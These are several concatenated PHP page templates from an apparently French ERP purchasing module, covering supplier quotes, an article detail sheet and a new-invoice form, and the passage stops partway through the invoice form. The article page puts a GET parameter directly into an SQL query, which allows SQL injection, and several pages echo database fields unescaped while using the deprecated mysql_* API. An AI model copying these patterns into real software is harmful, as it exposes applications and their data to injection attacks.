<div class="content">
<ul class="breadcrumb">
<li>
<p>VOUS ETES ICI</p>
</li>
<li><a href="#">ACHAT</a> </li>
<li><a href="index.devis.php">DEVIS</a></li>
<li><a href="nouv.client.php" class="active"><span class="semi-bold">Nouveau Devis</span></a></li>
</ul>
<div class="page-title"> <i class="icon-custom-left"></i>
<h3>ACHAT - <span class="semi-bold">Nouveau Devis</span></h3>
</div>
<?php
if($sql_devis_four == true){
?>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-body no-border">
<div class="row-fluid">
<div class="alert alert-block alert-success fade in">
<button data-dismiss="alert" class="close" type="button"></button>
<h4 class="alert-heading"><i class="icon-warning-sign"></i> SUCCES!</h4>
<p> Le Devis en date du <b><?php echo $date_devis_four; ?></b> à été créer avec succès. </p>
</div>
</div>
</div>
</div>
</div>
</div>
<?php } ?>
<?php
if($sql_devis_four == false){
?>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-body no-border">
<div class="row-fluid">
<div class="alert alert-block alert-error fade in">
<button data-dismiss="alert" class="close" type="button"></button>
<h4 class="alert-heading"><i class="icon-warning-sign"></i> ERROR!</h4>
<p> Une Erreur de type <b><?php echo $error; ?></b> s'est produit. Vérifier votre Code. </p>
</div>
</div>
</div>
</div>
</div>
</div>
<?php } ?>
</div>
</div>
</div>
<!-- END CONTAINER -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
</body>
</html><file_sep><?php
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li>
<p>VOUS ETES ICI</p>
</li>
<li><a href="#">ACHAT</a> </li>
<li><a href="index.devis.php" class="active">DEVIS</a></li>
</ul>
<div class="page-title"> <a href="<?php echo $rootsite; ?>"><i class="icon-custom-left"></i></a>
<h3>Achat - <span class="semi-bold">DEVIS</span></h3>
</div>
<div class="row-fluid">
<div class="span12">
<div class="grid simple ">
<div class="grid-title">
<h4>Liste des <span class="semi-bold">Devis Fournisseur</span></h4>
<a href="nouv.devis.php"><button class="btn btn-primary btn-cons" type="button"><i class="fa fa-plus"></i> Nouveau Devis</button></a>
<div class="tools"> <a href="javascript:;" class="collapse"></a> <a href="#grid-config" data-toggle="modal" class="config"></a> <a href="javascript:;" class="reload"></a> <a href="javascript:;" class="remove"></a> </div>
</div>
<div class="grid-body ">
<table class="table table-striped" id="example2" >
<thead>
<tr>
<th>ID Devis</th>
<th>Date du Devis</th>
<th>Fournisseur</th>
<th>Prix Total TTC</th>
<th>Action</th>
<th HIDDEN>Etat</th>
</tr>
</thead>
<tbody>
<?php
$sql_devis_four = mysql_query("SELECT * FROM devis_four, fournisseur WHERE devis_four.idfournisseur = fournisseur.idfournisseur");
while($donnee_devis_four = mysql_fetch_array($sql_devis_four))
{
?>
<tr class="odd gradeX">
<td>DEVFOUR000<?php echo $donnee_devis_four['iddevisfour']; ?></td>
<td><?php echo $donnee_devis_four['date_devis_four']; ?></td>
<td><?php echo $donnee_devis_four['raison_social']; ?></td>
<td><?php echo $donnee_devis_four['ptttc_devis_four']; ?> €</td>
<td>
<a href="fiche.devis.php?iddevisfour=<?php echo $donnee_devis_four['iddevisfour']; ?>"><button class="btn btn-primary btn-cons" type="button"><i class="fa fa-eye"></i> Fiche Devis</button></a>
<a href="supp.devis.php?iddevisfour=<?php echo $donnee_devis_four['iddevisfour']; ?>"><button class="btn btn-primary btn-cons" type="button"><i class="fa fa-eraser"></i> Supprimer</button>
</td>
<td HIDDEN>
<?php
switch($donnee_devis_four['etat_devis_four'])
{
case 1:
echo "<p class='text-info'>Devis édité</p>";
break;
case 2:
echo "<p class='text-success'>Devis Accepté</p>";
break;
case 3:
echo "<p class='text-error'>Devis Refusé</p>";
break;
case 9:
echo "<p class='text-success'>Transféré en Commande</p>";
break;
}
?>
</td>
</tr>
<?php } ?>
</tbody>
</table>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- END PAGE -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap-select2/select2.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-datatable/js/jquery.dataTables.min.js" type="text/javascript" ></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-datatable/extra/js/TableTools.min.js" type="text/javascript" ></script>
<script type="text/javascript" src="<?php echo $rootsite; ?>assets/plugins/datatables-responsive/js/datatables.responsive.js"></script>
<script type="text/javascript" src="<?php echo $rootsite; ?>assets/plugins/datatables-responsive/js/lodash.min.js"></script>
<!-- END PAGE LEVEL PLUGINS -->
<script src="<?php echo $rootsite; ?>assets/js/datatables.js" type="text/javascript"></script>
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
<!-- END JAVASCRIPTS -->
</body>
</html>
<file_sep><?php
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
$idarticle = $_GET['idarticle'];
$sql_article = mysql_query("SELECT * FROM article, fournisseur, famille_article, sous_famille_article
WHERE fournisseur.idfournisseur = article.idfournisseur
AND famille_article.idfamillearticle = article.idfamillearticle
AND sous_famille_article.idsousfamillearticle = article.idsousfamillearticle
AND idarticle=".$idarticle);
$donnee_article = mysql_fetch_array($sql_article);
$date = date("d-m-Y");
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li><p>Vous êtes Ici</p></li>
<li><a href="index.php">Article</a></li>
<li><a href="#" class="active">Fiche Article - <?php echo $donnee_article['desc_court']; ?></a> </li>
</ul>
<div class="page-title"> <i class="icon-custom-left"></i>
<h3>Article - <span class="semi-bold">ART000<?php echo $donnee_article['idarticle']; ?> - <?php echo $donnee_article['desc_court']; ?></span></h3>
</div>
<br>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-title no-border">
<h4>Article - <span class="semi-bold">Général</span></h4>
<div class="tools"> <a class="collapse" href="javascript:;"></a> <a class="config" data-toggle="modal" href="#grid-config"></a> <a class="reload" href="javascript:;"></a> <a class="remove" href="javascript:;"></a> </div>
</div>
<div class="grid-body no-border">
<div class="row-fluid">
<table width="100%">
<tr>
<td>Article N°</td>
<td>ART000<?php echo $donnee_article['idarticle']; ?></td>
</tr>
<tr>
<td>Libellé</td>
<td><?php echo $donnee_article['desc_court']; ?></td>
</tr>
<tr>
<td>Fournisseur</td>
<td><?php echo $donnee_article['raison_social']; ?></td>
</tr>
<tr>
<td>Code Barre</td>
<td><?php echo $donnee_article['code_barre']; ?></td>
</tr>
<tr>
<td>Famille Article</td>
<td><?php echo $donnee_article['designation']; ?></td>
</tr>
<tr>
<td>Sous Famille Article</td>
<td><?php echo $donnee_article['designation_famille']; ?></td>
</tr>
<tr>
<td>Référence Fournisseur</td>
<td><?php echo $donnee_article['ref_fournisseur']; ?></td>
</tr>
<tr>
<td>Référence Interne</td>
<td><?php echo $donnee_article['ref_interne']; ?></td>
</tr>
<tr>
<td>En Stock à partir du:</td>
<td>
<?php
if($donnee_article['date_debut'] >= $date){echo "<font color=red>".$donnee_article['date_debut']."</font>";}else{echo $donnee_article['date_debut'];}
?>
</td>
</tr>
</table>
</div>
</div>
</div>
</div>
</div>
<br>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-title no-border">
<h4>Article - <span class="semi-bold">Descriptif et caracteristique</span></h4>
<div class="tools"> <a class="collapse" href="javascript:;"></a> <a class="config" data-toggle="modal" href="#grid-config"></a> <a class="reload" href="javascript:;"></a> <a class="remove" href="javascript:;"></a> </div>
</div>
<div class="grid-body no-border">
<div class="row-fluid">
<div class="slimScrollDiv" style="position: relative; overflow: hidden; width: auto; height: 220px;"><div data-always-visible="1" data-height="220px" class="scroller" style="overflow: hidden; width: auto; height: 220px;">
<table width="100%">
<?php echo $donnee_article['desc_long']; ?>
</table>
</div><div class="slimScrollBar ui-draggable" style="background: none repeat scroll 0% 0% rgb(161, 178, 189); width: 7px; position: absolute; top: 0px; opacity: 0.4; display: block; border-radius: 7px; z-index: 99; right: 1px; height: 166.897px;"></div><div class="slimScrollRail" style="width: 7px; height: 100%; position: absolute; top: 0px; display: none; border-radius: 7px; background: none repeat scroll 0% 0% rgb(51, 51, 51); opacity: 0.2; z-index: 90; right: 1px;"></div></div>
</div>
</div>
</div>
</div>
</div>
<h4>Article - <span class="semi-bold">Stock et Tarif</span></h4>
<div class="row">
<div class="col-md-6">
<div class="grid simple">
<div class="grid-title no-border">
<h4>Article - <span class="semi-bold">Stock</span></h4>
<div class="tools"> <a class="collapse" href="javascript:;"></a> <a class="config" data-toggle="modal" href="#grid-config"></a> <a class="reload" href="javascript:;"></a> <a class="remove" href="javascript:;"></a> </div>
</div>
<div class="grid-body no-border">
<div class="row-fluid">
<div class="slimScrollDiv" style="position: relative; overflow: hidden; width: auto; height: 220px;"><div data-always-visible="1" data-height="220px" class="scroller" style="overflow: hidden; width: auto; height: 220px;">
<div class="row spacing-bottom 2col">
<div class="col-md-6 col-sm-6 spacing-bottom">
<div class="tiles red added-margin">
<div class="tiles-body">
<div class="controller"> <a class="reload" href="javascript:;"></a> <a class="remove" href="javascript:;"></a> </div>
<div class="tiles-title"> Stock Minimal </div>
<div class="heading"><span data-animation-duration="1200" data-value="<?php echo $donnee_article['stock_minima']; ?>" class="animate-number"><?php echo $donnee_article['stock_minima']; ?></span> </div>
</div>
</div>
</div>
<div class="col-md-6 col-sm-6">
<div class="tiles green added-margin">
<div class="tiles-body">
<div class="controller"> <a class="reload" href="javascript:;"></a> <a class="remove" href="javascript:;"></a> </div>
<div class="tiles-title"> Stock Réel </div>
<div class="row-fluid">
<div class="heading"> <span data-animation-duration="700" data-value="<?php echo $donnee_article['stock_reel']; ?>" class="animate-number"><?php echo $donnee_article['stock_reel']; ?></span> </div>
</div>
</div>
</div>
</div>
</div>
<?php
if($donnee_article['stock_reel'] == 0){echo "<h2><font color=red>Veuillez Commander le produit</font></h2>";}else{echo "";}
?>
</div><div class="slimScrollBar ui-draggable" style="background: none repeat scroll 0% 0% rgb(161, 178, 189); width: 7px; position: absolute; top: 0px; opacity: 0.4; display: block; border-radius: 7px; z-index: 99; right: 1px; height: 166.897px;"></div><div class="slimScrollRail" style="width: 7px; height: 100%; position: absolute; top: 0px; display: none; border-radius: 7px; background: none repeat scroll 0% 0% rgb(51, 51, 51); opacity: 0.2; z-index: 90; right: 1px;"></div></div>
</div>
<table width="100%">
<tr>
<td>Numéro de Serie: <b><?php echo $donnee_article['num_serie']; ?></b></td>
<td>Code Barre: <b><?php echo $donnee_article['code_barre']; ?></b></td>
<td>Poids: <b><?php echo $donnee_article['poids']; ?></b></td>
</tr>
</table>
</div>
</div>
</div>
<div class="col-md-6">
<div class="grid simple">
<div class="grid-title no-border">
<h4>Article - <span class="semi-bold">Tarif</span></h4>
<div class="tools"> <a class="collapse" href="javascript:;"></a> <a class="config" data-toggle="modal" href="#grid-config"></a> <a class="reload" href="javascript:;"></a> <a class="remove" href="javascript:;"></a> </div>
</div>
<div class="grid-body no-border">
<div class="row-fluid">
<div class="slimScrollDiv" style="position: relative; overflow: hidden; width: auto; height: 220px;"><div data-always-visible="1" data-height="220px" class="scroller" style="overflow: hidden; width: auto; height: 220px;">
<table width="100%">
<tr>
<th>Prix Achat HT</th>
<th>Prix Vente HT</th>
<th>Prix Vente TTC</th>
</tr>
<tr>
<td><?php echo $donnee_article['prix_achat_ht']; ?> €</td>
<td><?php echo $donnee_article['prix_vente_ht']; ?> €</td>
<td><h2><b><?php echo $donnee_article['prix_vente_ttc']; ?> €</b></h2></td>
</tr>
</table>
</div><div class="slimScrollBar ui-draggable" style="background: none repeat scroll 0% 0% rgb(161, 178, 189); width: 7px; position: absolute; top: 0px; opacity: 0.4; display: block; border-radius: 7px; z-index: 99; right: 1px; height: 166.897px;"></div><div class="slimScrollRail" style="width: 7px; height: 100%; position: absolute; top: 0px; display: none; border-radius: 7px; background: none repeat scroll 0% 0% rgb(51, 51, 51); opacity: 0.2; z-index: 90; right: 1px;"></div></div>
</div>
</div>
</div>
</div>
</div>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-title no-border">
<h4>Article - <span class="semi-bold">Images</span></h4>
<div class="tools"> <a class="collapse" href="javascript:;"></a> <a class="config" data-toggle="modal" href="#grid-config"></a> <a class="reload" href="javascript:;"></a> <a class="remove" href="javascript:;"></a> </div>
</div>
<div class="grid-body no-border">
<div class="row-fluid">
<div class="slimScrollDiv" style="position: relative; overflow: hidden; width: auto; height: 220px;"><div data-always-visible="1" data-height="220px" class="scroller" style="overflow: hidden; width: auto; height: 220px;">
<img width="300px" height="235px" src="<?php echo $donnee_article['images']; ?>" />
<img width="150px" height="115px" src="<?php echo $donnee_article['images2']; ?>" />
<img width="150px" height="115px" src="<?php echo $donnee_article['images3']; ?>" />
</div><div class="slimScrollBar ui-draggable" style="background: none repeat scroll 0% 0% rgb(161, 178, 189); width: 7px; position: absolute; top: 0px; opacity: 0.4; display: block; border-radius: 7px; z-index: 99; right: 1px; height: 166.897px;"></div><div class="slimScrollRail" style="width: 7px; height: 100%; position: absolute; top: 0px; display: none; border-radius: 7px; background: none repeat scroll 0% 0% rgb(51, 51, 51); opacity: 0.2; z-index: 90; right: 1px;"></div></div>
</div>
</div>
</div>
</div>
</div>
<br>
<br><br>
</div>
<!-- END PAGE -->
</div>
</div>
<!-- END CHAT -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="assets/plugins/boostrapv3/js/bootstrap.min.js" type="text/javascript"></script>
<script src="assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<script src="assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<!-- PAGE JS -->
<script src="assets/js/tabs_accordian.js" type="text/javascript"></script>
<!-- BEGIN CORE TEMPLATE JS -->
<script src="assets/js/core.js" type="text/javascript"></script>
<script src="assets/js/chat.js" type="text/javascript"></script>
<script src="assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
</body>
</html><file_sep><?php
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
$date = date("d-m-Y");
$date_30 = date('d-m-Y', strtotime("+30 days"));
?>
<script type="text/javascript">
$("#date").mask("99/99/9999");
</script>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li>
<p>VOUS ETES ICI</p>
</li>
<li><a href="#">Achat</a> </li>
<li><a href="index.php">Facture</a></li>
<li><a href="nouv.facture.php" class="active"><span class="semi-bold">Nouvelle Facture</span></a></li>
</ul>
<div class="page-title"> <i class="icon-custom-left"></i>
<h3>ACHAT - <span class="semi-bold">Nouvelle Facture</span></h3>
</div>
<div class="row">
<div class="col-md-12">
<div class="grid simple transparent">
<div class="grid-title">
<h4>Nouvelle <span class="semi-bold">Facture</span></h4>
<div class="tools"> <a href="javascript:;" class="collapse"></a> <a href="#grid-config" data-toggle="modal" class="config"></a> <a href="javascript:;" class="reload"></a> <a href="javascript:;" class="remove"></a> </div>
</div>
<div class="grid-body ">
<div class="row">
<form id="commentForm" action="valid.nouv.facture.php" method="post">
<div id="rootwizard" class="col-md-12">
<div class="form-wizard-steps">
<ul class="wizard-steps">
<li class="" data-target="#step1"> <a href="#tab1" data-toggle="tab"> <span class="step">1</span> <span class="title">Générale</span> </a> </li>
<li data-target="#step2" class=""> <a href="#tab2" data-toggle="tab"> <span class="step">2</span> <span class="title">Article</span> </a> </li>
</ul>
<div class="clearfix"></div>
</div>
<div class="tab-content transparent">
<div class="tab-pane" id="tab1"> <br>
<h4 class="semi-bold">Etape 1 - <span class="light">Générale</span></h4>
<br>
<div class="row form-row">
<div class="col-md-12">
<label>Fournisseur</label>
<select name="idfournisseur" class="form-control no-boarder " placeholder="Civilité">
<?php
$sql_fournisseur = mysql_query("SELECT * FROM fournisseur");
while($donnee_fournisseur = mysql_fetch_array($sql_fournisseur))
{
?>
<option value="<?php echo $donnee_fournisseur['idfournisseur']; ?>"><?php echo $donnee_fournisseur['raison_social']; ?></option>
<?php } ?>
</select>
</div>
</div>
<div class="row form-row">
<div class="col-md-6">
<div class="input-append success date col-md-10 col-lg-6 no-padding">
<label>Date de la facture</label>
<input type="text" class="form-control" name="date_fact_four" Value="<?php echo $date; ?>">
<span class="add-on"><span class="arrow"></span><i class="fa fa-th"></i></span> </div>
<br>
<br>
<div class="clearfix"></div>
</div>
<div class="col-md-6">
<div class="input-append success date col-md-10 col-lg-6 no-padding">
<label>Date de d'échéance</label>
<input type="text" class="form-control" name="date_echeance_fact_four" Value="<?php echo $date_30; ?>">
<span class="add-on"><span class="arrow"></span><i class="fa fa-th"></i></span> </div>
<br>
<br>
<div class="clearfix"></div>
</div>
</div>
<div class="row form-row">
<div class="col-md-6">
<label>Numéro de commande fournisseur (sans extension)</label>
<input type="text" id="txtFirstName" name="idcmdfour" class="form-control no-boarder " placeholder="Numéro de commande fournisseur">
</div>
<div class="col-md-6">
<label>Numéro de reception fournisseur (sans extension)</label>
<input type="text" id="txtLastName" name="idreceptionfour" class="form-control no-boarder " placeholder="Numéro de reception fournisseur">
</div>
</div>
</div>
<div class="tab-pane" id="tab2"> <br>
<h4 class="semi-bold">Etape 2 - <span class="light">ARTICLE</span></h4>
<br>
<div class="row form-row">
<table class="table table-bordered no-more-tables">
<thead>
<tr>
<th class="text-center" style="width:12%">Article</th>
<th class="text-center" style="width:22%">Quantité</th>
<th class="text-center" style="width:22%">Prix Prix total HT</th>
</tr>
</thead>
<tbody>
<tr>
<td class="text-center">
<select name="idarticle1" class="form-control no-boarder " placeholder="Civilité">
<?php
$sql_article = mysql_query("SELECT * FROM article");
while($donnee_article = mysql_fetch_array($sql_article))
{
?>
<option value="">Selectionner un article</option>
<option value="<?php echo $donnee_article['desc_court']; ?>"><?php echo $donnee_article['desc_court']; ?> <b><?php echo $donnee_article['prix_vente_ht']; ?></b></option>
<?php } ?>
</select>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="Qte" class="form-control no-boarder " name="qte1" id="txtFirstName">
</div>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="PTHT" class="form-control no-boarder " name="prix_vente_ht1" id="txtFirstName">
</div>
</td>
</tr>
<tr>
<td class="text-center">
<select name="idarticle2" class="form-control no-boarder " placeholder="Civilité">
<?php
$sql_article = mysql_query("SELECT * FROM article");
while($donnee_article = mysql_fetch_array($sql_article))
{
?>
<option value="">Selectionner un article</option>
<option value="<?php echo $donnee_article['desc_court']; ?>"><?php echo $donnee_article['desc_court']; ?> <b><?php echo $donnee_article['prix_vente_ht']; ?></b></option>
<?php } ?>
</select>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="Qte" class="form-control no-boarder " name="qte2" id="txtFirstName">
</div>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="PTHT" class="form-control no-boarder " name="prix_vente_ht2" id="txtFirstName">
</div>
</td>
</tr>
<tr>
<td class="text-center">
<select name="idarticle3" class="form-control no-boarder " placeholder="Civilité">
<?php
$sql_article = mysql_query("SELECT * FROM article");
while($donnee_article = mysql_fetch_array($sql_article))
{
?>
<option value="">Selectionner un article</option>
<option value="<?php echo $donnee_article['desc_court']; ?>"><?php echo $donnee_article['desc_court']; ?> <b><?php echo $donnee_article['prix_vente_ht']; ?></b></option>
<?php } ?>
</select>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="Qte" class="form-control no-boarder " name="qte3" id="txtFirstName">
</div>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="PTHT" class="form-control no-boarder " name="prix_vente_ht3" id="txtFirstName">
</div>
</td>
</tr>
<tr>
<td class="text-center">
<select name="idarticle4" class="form-control no-boarder " placeholder="Civilité">
<?php
$sql_article = mysql_query("SELECT * FROM article");
while($donnee_article = mysql_fetch_array($sql_article))
{
?>
<option value="">Selectionner un article</option>
<option value="<?php echo $donnee_article['desc_court']; ?>"><?php echo $donnee_article['desc_court']; ?> <b><?php echo $donnee_article['prix_vente_ht']; ?></b></option>
<?php } ?>
</select>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="Qte" class="form-control no-boarder " name="qte4" id="txtFirstName">
</div>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="PTHT" class="form-control no-boarder " name="prix_vente_ht4" id="txtFirstName">
</div>
</td>
</tr>
<tr>
<td class="text-center">
<select name="idarticle5" class="form-control no-boarder " placeholder="Civilité">
<?php
$sql_article = mysql_query("SELECT * FROM article");
while($donnee_article = mysql_fetch_array($sql_article))
{
?>
<option value="">Selectionner un article</option>
<option value="<?php echo $donnee_article['desc_court']; ?>"><?php echo $donnee_article['desc_court']; ?> <b><?php echo $donnee_article['prix_vente_ht']; ?></b></option>
<?php } ?>
</select>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="Qte" class="form-control no-boarder " name="qte5" id="txtFirstName">
</div>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="PTHT" class="form-control no-boarder " name="prix_vente_ht5" id="txtFirstName">
</div>
</td>
</tr>
<tr>
<td class="text-center">
<select name="idarticle6" class="form-control no-boarder " placeholder="Civilité">
<?php
$sql_article = mysql_query("SELECT * FROM article");
while($donnee_article = mysql_fetch_array($sql_article))
{
?>
<option value="">Selectionner un article</option>
<option value="<?php echo $donnee_article['desc_court']; ?>"><?php echo $donnee_article['desc_court']; ?> <b><?php echo $donnee_article['prix_vente_ht']; ?></b></option>
<?php } ?>
</select>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="Qte" class="form-control no-boarder " name="qte6" id="txtFirstName">
</div>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="PTHT" class="form-control no-boarder " name="prix_vente_ht6" id="txtFirstName">
</div>
</td>
</tr>
<tr>
<td class="text-center">
<select name="idarticle7" class="form-control no-boarder " placeholder="Civilité">
<?php
$sql_article = mysql_query("SELECT * FROM article");
while($donnee_article = mysql_fetch_array($sql_article))
{
?>
<option value="">Selectionner un article</option>
<option value="<?php echo $donnee_article['desc_court']; ?>"><?php echo $donnee_article['desc_court']; ?> <b><?php echo $donnee_article['prix_vente_ht']; ?></b></option>
<?php } ?>
</select>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="Qte" class="form-control no-boarder " name="qte7" id="txtFirstName">
</div>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="PTHT" class="form-control no-boarder " name="prix_vente_ht7" id="txtFirstName">
</div>
</td>
</tr>
<tr>
<td class="text-center">
<select name="idarticle8" class="form-control no-boarder " placeholder="Civilité">
<?php
$sql_article = mysql_query("SELECT * FROM article");
while($donnee_article = mysql_fetch_array($sql_article))
{
?>
<option value="">Selectionner un article</option>
<option value="<?php echo $donnee_article['desc_court']; ?>"><?php echo $donnee_article['desc_court']; ?> <b><?php echo $donnee_article['prix_vente_ht']; ?></b></option>
<?php } ?>
</select>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="Qte" class="form-control no-boarder " name="qte8" id="txtFirstName">
</div>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="PTHT" class="form-control no-boarder " name="prix_vente_ht8" id="txtFirstName">
</div>
</td>
</tr>
<tr>
<td class="text-center">
<select name="idarticle9" class="form-control no-boarder " placeholder="Civilité">
<?php
$sql_article = mysql_query("SELECT * FROM article");
while($donnee_article = mysql_fetch_array($sql_article))
{
?>
<option value="">Selectionner un article</option>
<option value="<?php echo $donnee_article['desc_court']; ?>"><?php echo $donnee_article['desc_court']; ?> <b><?php echo $donnee_article['prix_vente_ht']; ?></b></option>
<?php } ?>
</select>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="Qte" class="form-control no-boarder " name="qte9" id="txtFirstName">
</div>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="PTHT" class="form-control no-boarder " name="prix_vente_ht9" id="txtFirstName">
</div>
</td>
</tr>
<tr>
<td class="text-center">
<select name="idarticle10" class="form-control no-boarder " placeholder="Civilité">
<?php
$sql_article = mysql_query("SELECT * FROM article");
while($donnee_article = mysql_fetch_array($sql_article))
{
?>
<option value="">Selectionner un article</option>
<option value="<?php echo $donnee_article['desc_court']; ?>"><?php echo $donnee_article['desc_court']; ?> <b><?php echo $donnee_article['prix_vente_ht']; ?></b></option>
<?php } ?>
</select>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="Qte" class="form-control no-boarder " name="qte10" id="txtFirstName">
</div>
</td>
<td class="text-right">
<div class="col-md-12">
<input type="text" placeholder="PTHT" class="form-control no-boarder " name="prix_vente_ht10" id="txtFirstName">
</div>
</td>
</tr>
<tr>
<td class="text-center">
<select name="idarticle11" class="form-control no-boarder " placeholder="Civilité">
<?php
$sql_article = mysql_query("SELECT * FROM article");
while($donnee_article = mysql_fetch_array($sql_article))
{
?>
<option value="">Selectionner un article</option>
